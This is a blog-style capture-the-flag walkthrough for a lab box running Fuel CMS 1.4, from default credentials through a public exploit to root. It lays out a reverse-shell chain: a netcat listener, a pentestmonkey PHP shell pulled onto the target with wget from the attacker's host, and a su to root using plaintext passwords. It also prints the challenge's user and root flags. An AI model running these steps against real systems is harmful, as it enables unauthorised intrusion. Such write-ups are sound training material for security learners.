A new start-up has a few issues with their web server.
Root the box! Designed and created by DarkStar7471, built by Paradox.
You know the drill - enumeration:
![](https://static.wixstatic.com/media/b4353b_2494ee1be0f64529835649b013f4d24b~mv2.png/v1/fill/w_73,h_51,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_2494ee1be0f64529835649b013f4d24b~mv2.png)
Ok. Only a website here running on apache 2.4.18 on an Ubuntu box. Let's hit the site. Looks like it's a CMS called Fuel 1.4 which hasn't been setup yet. It talks about a GitHub download so there should be some documentation. There's even a link there for the admin portal /fuel and the default credentials are supplied.
Wow. It let us in. We can even change the password - lol Let's change it later... but in real life, I'd change that thing for persistence.
![](https://static.wixstatic.com/media/b4353b_0a9be75b93214cb095a08348b3ac45e7~mv2.png/v1/fill/w_48,h_22,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_0a9be75b93214cb095a08348b3ac45e7~mv2.png)
It looks like I can create pages, so let's do that. Trying the pentestmonkey php reverse shell gives us an error about the server setup to upload files this size. Let's dig into settings.
![](https://static.wixstatic.com/media/b4353b_d42d13f864dd4da19bda5c2532a2d727~mv2.png/v1/fill/w_48,h_13,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_d42d13f864dd4da19bda5c2532a2d727~mv2.png)
Actually there's a known bug is this here: https://www.exploit-db.com/exploits/50477 It's a python script so let's go.
![](https://static.wixstatic.com/media/b4353b_8e21ee260fda41f58783908f8b106001~mv2.png/v1/fill/w_73,h_29,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_8e21ee260fda41f58783908f8b106001~mv2.png)
ok... seemed easy enough. Can't do much here so we'll have to try and find a way to get us a better shell. First things first let's
grab the pentestmonkey reverse shell php script and edit it so it points back to our IP.
start a netcat listener (nc -lvnp 1234)
start a python http server to host our php reverse shell (python3 -m http.server)
upload that new php script to the server, using the shell our exploit script gave us. (wget http://[yourIP]:8000/shell.php)
Visit the website we uploaded and this should pop us a shell as the web server.
Once we have the shell we can cd into the user folder and get the first flag
![](https://static.wixstatic.com/media/b4353b_1a7a0a8a343f4293a04f58a162e4cc9a~mv2.png/v1/fill/w_74,h_17,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_1a7a0a8a343f4293a04f58a162e4cc9a~mv2.png)
User.txt is 6470e394cbf6dab6a91682cc8585059b
I did NOT enumerate properly earlier. I was stuck on this for a bit and ended up reading the writeup a bit where he hinted he found his on the main screen... I try not to read too far into the write up - once it gives me the start of a hint I stop reading and look for myself.
Looking I saw this database thing. So since I already have a shell, I decided to cat out that file.
![](https://static.wixstatic.com/media/b4353b_76271aab32fa42cfa612d66df89f01f4~mv2.png/v1/fill/w_84,h_67,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_76271aab32fa42cfa612d66df89f01f4~mv2.png)
Looks like we have some plain text passwords here and root is right there. Let's do a su to root and get that flag.
![](https://static.wixstatic.com/media/b4353b_ad31c802f82b4464a0b0f93f75932854~mv2.png/v1/fill/w_73,h_24,al_c,q_85,usm_0.66_1.00_0.01,blur_2,enc_auto/b4353b_ad31c802f82b4464a0b0f93f75932854~mv2.png)
Root.txt is b9bbcb33e11b80be759c4e844862482d